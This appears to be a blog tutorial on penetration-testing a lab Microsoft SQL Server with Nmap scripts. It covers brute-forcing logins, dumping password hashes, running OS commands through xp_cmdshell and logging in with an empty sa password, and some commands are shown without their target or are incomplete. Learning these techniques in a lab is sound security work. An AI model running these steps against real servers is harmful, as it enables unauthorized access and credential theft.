Subscribe to Blog via Email



Nmap, Penetration Testing

MSSQL Peneration Testing using Nmap

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article, we had set up Microsoft SQL server in Windows 10.


Attacker: Kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

Scan port 1433

Open the terminal in Kali Linux and scan target IP for port 1433 using nmap command.

nmap -p 1433

From given below image you can observe that port 1433 is open for MS-SQL service.

Enumerating version information

Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 --script ms-sql-info

In specified below image you can observe the install version and details of MS-SQL server.

Brute Force Attacker

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt

In the specified image you can observe that we had successfully retrieve credential for two users:

  • Username: ignite and password:12345
  • Username: sa and password:admin123

Execute MS-SQL Query

Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases"

Hence as result, it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.

Check Microsoft SQL server configuration

 The following command will attempt to describe the Microsoft SQL server configuration setting by passing login credential as an argument through nmap script.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123

Hence you can check configuration setting from given below image.

Obtain a list of tables

The following command will attempt to fetch a list of tables from inside Microsoft SQL server by passing login credential as an argument through nmap script.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123

Hence you can checklist of tables from given below image.

Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with an NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

nmap -p 1433 --script ms-sql-ntlm-info

Hence from given below image, you can read the NetBIOS information remote Microsoft SQL server.

Dump password hashes

The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so, the user needs to have the appropriate DB privileges.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123

From the given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.

Identify the database owner

Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so, the user needs to have the appropriate DB privileges. Therefore we have passes username and password as an argument through NMAP script.

nmap -p 1433 --script ms-sql-hashdbaccess --script-args mssql.username=sa,mssql.password=admin123

In the specified image you can observe that it showing user sa is owner the database “ignite”.

Ms-SQL Allows XP_cmdshell option

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. By default, the xp_cmdshell option is disabled.

From given below image you can see we had enabled the xp_cmdshell function by executing the following statement inside the master database.

EXEC sp_configure ‘xp_cmdshell’;

Now save the above configuration setting through the following statement:


Exploit XP_cmdshell Function

Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in the targeted server.

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-sql-xp-cmdshell.cmd="net user "

From the given image you can confirm that we have executed OS command: net user as retrieving user account.

Blank password lead to unauthorized access

If the admin of Microsoft-SQL Server left the password Blank for login then the attacker can director login into the database server, from given below image you can see we are exploring the property of a user’s account “sa”.

Here kept “blank space” as the password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space, therefore, chances of making unauthorized access into the server by the attacker will get increases.

Make unauthorized access into SQL server

Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 --script ms-sql-empty-password

From given below image you can perceive we had made successfully login with user: sa and an empty password.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

One thought on “MSSQL Peneration Testing using Nmap

Leave a Reply

Your email address will not be published. Required fields are marked *